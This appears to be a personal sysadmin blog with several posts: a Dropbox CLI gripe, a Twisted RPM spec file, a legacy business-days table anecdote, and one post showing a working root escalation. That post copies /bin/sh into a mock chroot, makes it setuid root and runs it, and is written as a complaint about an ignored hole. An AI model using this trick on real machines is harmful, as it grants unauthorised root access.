Doesn't Anyone Think This Is a Problem?

I can trivially get root on a machine if the user is member of the 'mock' group.

$ /usr/bin/mock -r epel-5-i386 --copyin /bin/sh /
$ /usr/bin/mock -r epel-5-i386 --shell 'chmod 4755 /sh'
$ /var/lib/mock/epel-5-i386/root/sh
#

In order to use mock properly, you have to be in the mock group. It just doesn't work properly even with sudo unless you're in that group. Once you're in that group, you can elevate privs in the chroot it creates and run arbitary scripts.

I did a quick google and I can't even find anything with keywords like "mock is a gigantic security hole because mock has lots of suid root stuff in it that lets you trivially root a machine if you've ever gotten it to work properly in the past."

It doesn't make any sense to me. Talking to two admins today led me to conclude that they both knew about this problem, and thought it wasn't an issue.

Broken Software is Broken

I have very low expectations of open source software, and I don't feel put out when I have to fix it. But when I use close source software I expect it to 'just work' and get frustrated when it doesn't.

sthorne@pearl~/w/netbox> dropbox stop
Dropbox isn't running! 
sthorne@pearl~/w/netbox> dropbox start 
Dropbox isn't running! 
Dropbox is already running!
sthorne@pearl~/w/netbox> killall dropbox 
sthorne@pearl~/w/netbox> dropbox start 
Starting Dropbox...Done!

I really shouldn't complain too loudly. As I'm in the process of backing up all my email I've ever received to it.

Simple Twisted RPM Spec File

I needed to build twisted for RHEL5 (Really, centos5, but who cares, they’re the same thing with different lawyers).
This is a really simple spec file that lets me build the dratted thing with a minimum of fuss. Twisted tarball is the one from http://twistedmatrix.com/trac/wiki/Downloads.

%define name python-twisted
%define version 10.1.0
%define release 1
%{!?python_sitelib: %define python_sitelib %(%{__python} -c "from distutils.sysconfig import get_python_lib; print get_python_lib()")}
Summary: Event-based framework for internet applications
Name: %{name}
Version: %{version}
Release: %{release}
Source0: Twisted-%{version}.tar.bz2
License: MIT
Group: Development/Libraries
BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-buildroot
Prefix: %{_prefix}
BuildArch: i386
Vendor: Your Name
Url: http://twistedmatrix.com/
BuildRequires: python-devel
Requires: python
Requires: python-zope-interface
Obsoletes: python-twisted-core
%description
See summary.
%prep
%setup -q -c
%build
cd Twisted-10.1.0
%{__python} setup.py build
%install
cd Twisted-10.1.0
%{__python} setup.py install --root=$RPM_BUILD_ROOT
%clean
rm -rf $RPM_BUILD_ROOT
%files
%defattr(-,root,root)
%{python_sitelib}/twisted
%{_bindir}

The Days of Horror Story

Quite a while ago, I wrote out some of my experiences at a previous employer, as a cathartic release on the tension they caused me. It helped a lot,

Todays The Daily WTF titled "Got Time?" reminded me of one of those horrible hacks I had to deal with when I was there.

We used to have one of those business rules. "X business days from now". Where weekends, and national public holidays, were not considered "business days". Because this business rule was observed in the Oracle Forms interface that was used by our operations staff, a way to take now() + N business days was needed.

# select * from days_of_week order by num;
 day_of_week num
 ----------- ---
...
 31/07/2005  401  
 01/08/2005  
 02/08/2005  
 03/08/2005  402
 04/08/2005  403

In this entirely ficticious example from my memory of this table, that's what the data looked like. All saturdays and sundays and public holidays were listed in the table with a blank 'num'. To find a date 10 business days from now, you would do: select day_of_week from days_of_week where num = (select num from days_of_week where day_of_week = today()) + 10.

Every so often we would "run out of days" and an email would be sent. Then a script would be written to add another batch of days to the table, then we'd be good until we run out again...

I've been at my current employer for over 5 years now, and am extremely happy I left tripe like what I've just dredged out of my memory behind.